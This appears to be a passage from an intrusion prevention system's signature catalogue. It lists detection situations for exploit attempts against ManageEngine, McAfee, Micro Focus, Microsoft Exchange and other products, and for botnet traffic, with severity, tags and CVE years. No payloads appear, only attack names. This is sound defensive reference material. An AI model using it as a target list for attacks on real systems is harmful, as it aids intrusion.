About this situation: An attempt to exploit a vulnerability in ManageEngine IT360 detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine IT360, ManageEngine NetFlow, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Manageengine-NetFlow-Analyzer-And-IT360-CSVServlet-Arbitrary-File-Download
Description:
Back to top

HTTP_CRL-Manageengine-Opmanager-Apmalertoperationsservlet-Source-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine OpManager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine OpManager, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: Manageengine-Opmanager-Apmalertoperationsservlet-Source-SQL-Injection
Description:
Back to top

HTTP_CRL-Manageengine-Opmanager-Apmintegbusinessviewhandler-Opm_bvname-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine OpManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine OpManager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-796-5211
Vulnerability: Manageengine-Opmanager-Apmintegbusinessviewhandler-Opm_bvname-SQL-Injection
Description:
Back to top

HTTP_CRL-Manageengine-Opmanager-Directory-Deletion-CVE-2021-20078

About this situation: An attempt to exploit a vulnerability in ManageEngine OpManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine OpManager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1510-5242
Last changed: sgpkg-ips-1510-5242
Vulnerability: Manageengine-Opmanager-Directory-Deletion-CVE-2021-20078
Description:
Back to top

HTTP_CRL-Manageengine-Opmanager-Hidden-Administrator-Account-Usage

About this situation: An attempt to exploit login to ManageEngine OpManager using a hidden administrator account detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine OpManager, CVE2015, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Manageengine-Opmanager-SubmitQuery-IntegrationUser-Hidden-Administrator-Account
Description:
Back to top

HTTP_CRL-Manageengine-Opmanager-SubmitQuery-SQL-Injection

About this situation: An attempt to exploit a vulnerability in OpManager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine OpManager, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: Manageengine-Opmanager-SubmitQuery-IntegrationUser-Hidden-Administrator-Account
Description:
Back to top

HTTP_CRL-Manageengine-Password-Manager-Pro-SQL-Injection

About this situation: An attempt to exploit a Manageengine Password Manager Pro SQL Injection vulnerability.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine Password Manager Pro, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-695-5211
Last changed: sgpkg-ips-695-5211
Vulnerability: Manageengine-Password-Manager-Pro-SQL-Injection
Description:
Back to top

HTTP_CRL-Manageengine-Recovery-Manager-Plus-XSS-CVE-2018-9163

About this situation: An attempt to exploit a vulnerability in ManageEngine Recovery Manager Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine Recovery Manager Plus, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Manageengine-Recovery-Manager-Plus-XSS-CVE-2018-9163
Description:
Back to top

HTTP_CRL-Manageengine-Security-Manager-Plus-Advanced-Search-SQL-Injection

About this situation: An attempt to exploit a ManageEngine Security Manager Plus Advanced Search SQL Injection vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, ManageEngine Security Manager Plus, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-867-5242
Vulnerability: Manageengine-Security-Manager-Plus-Advanced-Search-SQL-Injection
Description:
Back to top

HTTP_CRL-Manageengine-Servicedesk-Downloadsnapshotservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ServiceDesk detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ServiceDesk, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1032-5242
Vulnerability: Manageengine-Servicedesk-Downloadsnapshotservlet-Directory-Traversal
Description:
Back to top

HTTP_CRL-Manageengine-Servicedesk-Filedownload.jsp-Fname-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in ManageEngine ServiceDesk Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine ServiceDesk Plus, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-714-5211
Last changed: sgpkg-ips-714-5211
Vulnerability: Manageengine-Servicedesk-Filedownload.jsp-Fname-Directory-Traversal
Description:
Back to top

HTTP_CRL-Manageengine-Servicedesk-Plus-User-Privileges-Bypass

About this situation: An attempt to exploit a vulnerability in ManageEngine ServiceDesk Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine ServiceDesk Plus, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1093-5242
Vulnerability: Manageengine-Servicedesk-Plus-User-Privileges-Bypass
Description:
Back to top

HTTP_CRL-Mango-Automation-Scada-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Mango Automation SCADA/HMI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Mango Automation SCADA/HMI, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Vulnerability: Mango-Automation-Scada/Hmi-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Mantal.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.PasswordStealer.Mantal.A-Botnet
Description:
Back to top

HTTP_CRL-Mantis-Bug-Tracker-Filter-API-View_Type-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Mantis Bug Tracker detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Mantis Bug Tracker, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-798-5211
Vulnerability: Mantis-Bug-Tracker-Filter-API-View_Type-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Mantis-MantisBT-Bug-Tracker_Config_Report-Move_Attachments_Page-XSS

About this situation: An attempt to exploit a vulnerability in Mantis MantisBT detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MantisBT, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-872-5242
Last changed: sgpkg-ips-872-5242
Vulnerability: Mantis-MantisBT-Bug-Tracker-Config_Report-Move_Attachments_Page-XSS
Description:
Back to top

HTTP_CRL-Marketscore.B-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Adware.Marketscore.B-Botnet
Description:
Back to top

HTTP_CRL-McAfee-Asset-Manager-Downloadreport-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in McAfee Asset Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, McAfee Asset Manager, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-573-5211
Vulnerability: McAfee-Asset-Manager-Downloadreport-Information-Disclosure
Description:
Back to top

HTTP_CRL-McAfee-Epolicy-Orchestrator-Multiple-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in McAfee ePolicy Orchestrator detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, McAfee ePolicy Orchestrator, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: McAfee-Epolicy-Orchestrator-Multiple-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-McAfee-Epolicy-Orchestrator-Uid-Multiple-SQL-Injection

About this situation: An attempt to exploit a vulnerability in McAfee ePolicy Orchestrator detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, McAfee ePolicy Orchestrator, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-535-5211
Vulnerability: McAfee-Epolicy-Orchestrator-Uid-Multiple-SQL-Injection
Description:
Back to top

HTTP_CRL-McAfee-Epolicy-Orchestrator-XML-Entity-Injection

About this situation: An attempt to exploit a vulnerability in McAfee ePolicy Orchestrator detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, McAfee ePolicy Orchestrator, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: McAfee-Epolicy-Orchestrator-XML-Entity-Injection
Description:
Back to top

HTTP_CRL-McAfee-Firewall-Reporter-IsValidClient-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in McAfee Firewall Reporter
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, McAfee Firewall Reporter, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-1700-5242
Vulnerability: McAfee-Firewall-Reporter-IsValidClient-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-MDaemon-HTTP-Raw-Message-Handler-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Alt-N Technologies MDaemon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, MDaemon, CVE2003, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-1405-5242
Vulnerability: MDaemon-Raw-Message-Handler-Buffer-Overflow
Description:
Back to top

HTTP_CRL-MediaWiki-CSS-Extension-Path-Traversal

About this situation: An attempt to exploit a vulnerability in Wikimedia Foundation MediaWiki CSS Extension
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MediaWiki, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1808-5242
Vulnerability: MediaWiki-CSS-Extension-Path-Traversal
Description:
Back to top

HTTP_CRL-MediaWiki-Uselang-Php-Code-Execution

About this situation: Detects MediaWiki PHP code execution exploits
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MediaWiki, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-1589-5242
Vulnerability: HTTP-MediaWiki-Uselang-Php-Code-Execution
Description:
Back to top

HTTP_CRL-Metabase-GeoJSON-URL-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in Metabase
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Metabase, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1799-5242
Last changed: sgpkg-ips-1799-5242
Vulnerability: Metabase-GeoJSON-URL-Local-File-Inclusion
Description:
Back to top

HTTP_CRL-Metersphere-V1.15.4-Authenticated-SQL-Injection

About this situation: An attempt to exploit a vulnerability in MeterSphere v1.15.4 Authenticated SQL Injection detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Metersphere, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Vulnerability: Metersphere-V1.15.4-Authenticated-SQL-Injection
Description:
Back to top

HTTP_CRL-Micro-Focus-Groupwise-Admin-Console-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Micro Focus GroupWise detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Micro Focus GroupWise, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-811-5242
Vulnerability: Micro-Focus-Groupwise-Admin-Console-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Micro-Focus-Groupwise-Post-Office-Agent-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Micro Focus GroupWise detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Micro Focus GroupWise, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: Micro-Focus-Groupwise-Post-Office-Agent-Integer-Overflow
Description:
Back to top

HTTP_CRL-Micro-Focus-NetIQ-Access-Manager-Identity-Server-Ospuibasicssodownload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Micro Focus NetIQ Access Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Micro Focus NetIQ Access Manager, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Micro-Focus-NetIQ-Access-Manager-Identity-Server-Directory-Traversal
Description:
Back to top

HTTP_CRL-Micro-Focus-NetIQ-Sentinel-Server-Reportviewservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Micro Focus NetIQ Sentinel detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Micro Focus NetIQ Sentinel, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Micro-Focus-NetIQ-Sentinel-Server-Reportviewservlet-Directory-Traversal
Description:
Back to top

HTTP_CRL-Micro-Focus-Operations-Bridge-Manager-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in Micro Focus Operations Bridge Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Micro Focus Operations Bridge Manager, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Vulnerability: Micro-Focus-Operations-Bridge-Manager-Authenticated-RCE
Description:
Back to top

HTTP_CRL-Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection

About this situation: An attempt to exploit a vulnerability in Micro Focus Operations Bridge Manager detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Any Hardware, Micro Focus Operations Bridge Manager, CVE2021, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1366-5242
Vulnerability: Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection
Description:
Back to top

HTTP_CRL-Micro-Focus-Secure-Messaging-Gateway-Command-Injection

About this situation: An attempt to exploit a vulnerability in Micro Focus Secure Messaging Gateway detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Micro Focus Secure Messaging Gateway, CVE2020, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1285-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Micro-Focus-Secure-Messaging-Gateway-Command-Injection
Description:
Back to top

HTTP_CRL-Micro-Focus-Secure-Messaging-Gateway-Enginelist.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Micro Focus Secure Messaging Gateway detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Micro Focus Secure Messaging Gateway, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1100-5242
Last changed: sgpkg-ips-1100-5242
Vulnerability: Micro-Focus-Secure-Messaging-Gateway-Enginelist.php-SQL-Injection
Description:
Back to top

HTTP_CRL-Micro-Focus-UCMDB-Java-Deserialization-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in Micro Focus Operations Bridge Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Micro Focus Operations Bridge Manager, CVE2020, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1637-5242
Vulnerability: Micro-Focus-UCMDB-Java-Deserialization-Unauthenticated-RCE
Description:
Back to top

HTTP_CRL-Microjoin.gen_C-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Downloader.Microjoin.gen_C-Botnet
Description:
Back to top

HTTP_CRL-Microsoft-Active-Directory-Federation-Services-XSS-CVE-2015-1757

About this situation: An attempt to exploit a vulnerability in Microsoft Active Directory Federation Services detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows 2008 R2, Windows 2012, Windows 2008, Any Hardware, MS2015-06, CVE2015, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-1607-5242
Vulnerability: Microsoft-Active-Directory-Federation-Services-XSS-CVE-2015-1757
Description:
Back to top

HTTP_CRL-Microsoft-Anti-XSS-Library-Bypass-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Anti-XSS Library detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Anti-XSS Libarary, MS2012-01, CVE2012, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-433-4219
Last changed: sgpkg-ips-451-4333
Vulnerability: Microsoft-Anti-XSS-Library-Bypass-Vulnerability
Description:
Back to top

HTTP_CRL-Microsoft-ASP.NET-Forms-Authentication-Elevation-Of-Privilege

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2011-12, CVE2011, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-432-4219
Vulnerability: Microsoft-ASP.NET-Forms-Authentication-Elevation-Of-Privilege
Description:
Back to top

HTTP_CRL-Microsoft-ASP.NET-ViewState-Denial-Of-Service

About this situation: Detects a denial of service exploit against Microsoft ASP.NET
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Windows, Any Hardware, Microsoft ASP.NET, CVE2005, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-180-2032
Last changed: sgpkg-ips-600-5211
Vulnerability: Microsoft-ASP.NET-ViewState-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Microsoft-Dynamics-AX-Cross-Site-Scripting-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Dynamics AX detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Dynamics AX, MS2012-06, CVE2012, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-457-5211
Last changed: sgpkg-ips-457-5211
Vulnerability: Microsoft-Dynamics-AX-Cross-Site-Scripting-Vulnerability
Description:
Back to top

HTTP_CRL-Microsoft-Edge-CVE-2016-7280

About this situation: An attempt to trigger a vulnerability in Microsoft Edge detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-12, CVE2016, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-834-5242
Last changed: sgpkg-ips-834-5242
Vulnerability: Microsoft-Edge-CVE-2016-7206
Description:
Back to top

HTTP_CRL-Microsoft-Exchange-Addtenantdlppolicy-Ruleparameters-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: Microsoft-Exchange-Addtenantdlppolicy-Ruleparameters-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Microsoft-Exchange-CVE-2021-26858-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1342-5242
Last changed: sgpkg-ips-1342-5242
Vulnerability: Microsoft-Exchange-CVE-2021-26858-Arbitrary-File-Write
Description:
Back to top

HTTP_CRL-Microsoft-Exchange-Post-Auth-Arbitrary-File-Write-CVE-2021-31207-2

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1385-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: Microsoft-Exchange-Post-Auth-Arbitrary-File-Write-CVE-2021-31207
Description:
Back to top

HTTP_CRL-Microsoft-Exchange-Privilege-Escalation-Exploit

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Exchange Server, CVE2018, CVE2019, Any Operating System not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1308-5242
Vulnerability: Microsoft-Exchange-Privilege-Escalation-Exploit
Microsoft-Exchange-Privilege-Escalation-Exploit-CVE-2018-8581
Description:
Back to top

HTTP_CRL-Microsoft-Exchange-ProxyShell-RCE

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Vulnerability: Microsoft-Exchange-ProxyShell-RCE
Description:
Back to top

HTTP_CRL-Microsoft-Exchange-Server-ImportTransportRuleCollection-RCE

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Exchange Server, CVE2020, Any Operating System not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Vulnerability: Microsoft-Exchange-Server-ImportTransportRuleCollection-RCE
Description:
Back to top

HTTP_CRL-Microsoft-Exchange-Server-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Vulnerability: Microsoft-Exchange-Server-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Microsoft-Exchange-SSRF-CVE-2021-34473

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, Exchange Server, MS2021-07, CVE2021, Windows not specific, Exchange Server not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1529-5242
Vulnerability: Microsoft-Exchange-SSRF-CVE-2021-34473
Description:
Back to top

HTTP_CRL-Microsoft-Exchange-SSRF-CVE-2021-34473-2

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2021-07, CVE2021, Windows not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1510-5242
Last changed: sgpkg-ips-1529-5242
Vulnerability: Microsoft-Exchange-SSRF-CVE-2021-34473
Description:
Back to top

HTTP_CRL-Microsoft-Exchange-Validation-Key-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1255-5242
Vulnerability: Microsoft-Exchange-Validation-Key-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Microsoft-Internet-Explorer-8-Ieshims.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Normalized Request-Line
Severity: 7
